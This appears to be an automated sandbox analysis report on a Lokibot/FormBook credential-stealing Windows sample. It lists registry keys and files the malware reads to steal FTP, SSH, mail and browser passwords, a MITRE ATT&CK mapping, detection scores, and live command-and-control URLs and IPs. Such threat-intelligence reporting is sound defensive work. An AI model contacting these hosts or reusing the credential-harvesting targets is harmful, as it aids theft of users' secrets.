Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Queries volume information: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HxQXdrrQ.exe PID: 7096, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000009.00000002.3266647288.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YvVDV4cbjy.exe PID: 6584, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: PopPassword		15_2_0040D069
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: SmtpPassword		15_2_0040D069

Source: Yara match	File source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
YvVDV4cbjy.exe	75%	Virustotal		Browse
YvVDV4cbjy.exe	79%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
YvVDV4cbjy.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	79%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook

Source	Detection	Scanner	Label	Link
http://94.156.177.41/simple/five/fre.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://94.156.177.41/simple/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	YvVDV4cbjy.exe, 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, HxQXdrrQ.exe, 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	high
http://localhost/calculator_server/requests.php	YvVDV4cbjy.exe, HxQXdrrQ.exe.0.dr	false	high
http://www.ibsensoftware.com/	HxQXdrrQ.exe, HxQXdrrQ.exe, 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588964
Start date and time:	2025-01-11 07:43:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	YvVDV4cbjy.exe renamed because original name is a hash value
Original Sample Name:	ee0558d98d1151d6ce6ebb419a05e6def3c758f703518648a03c03ed8d830726.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/17@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 70 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:44:21	API Interceptor	130x Sleep call for process: YvVDV4cbjy.exe modified
01:44:23	API Interceptor	31x Sleep call for process: powershell.exe modified
01:44:26	API Interceptor	1x Sleep call for process: HxQXdrrQ.exe modified
07:44:23	Task Scheduler	Run new task: HxQXdrrQ path: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	EozUxz4ybi.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	oAUBqI6vQ7.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	Quotation2025-0107pdf.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/mars/five/fre.php
	ZsRFRjkt9q.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/alpha/five/fre.php
	0yWVteGq5T.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	CLOSURE DATE FOR THE YEAR.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/kings/five/fre.php
	Order84746.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/davinci/five/fre.php
	FVR-N2411-07396.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/soja/five/fre.php
	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	EozUxz4ybi.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	oAUBqI6vQ7.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	IpykYx5iwz.exe	Get hash	malicious	Remcos, GuLoader	Browse	94.156.177.164
	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	94.156.177.117
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	95.87.199.40
	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	93.123.77.220
	Kloki.arm7.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.x86_64.elf	Get hash	malicious	Unknown	Browse	83.222.189.67
	Kloki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.190.214

Process:	C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
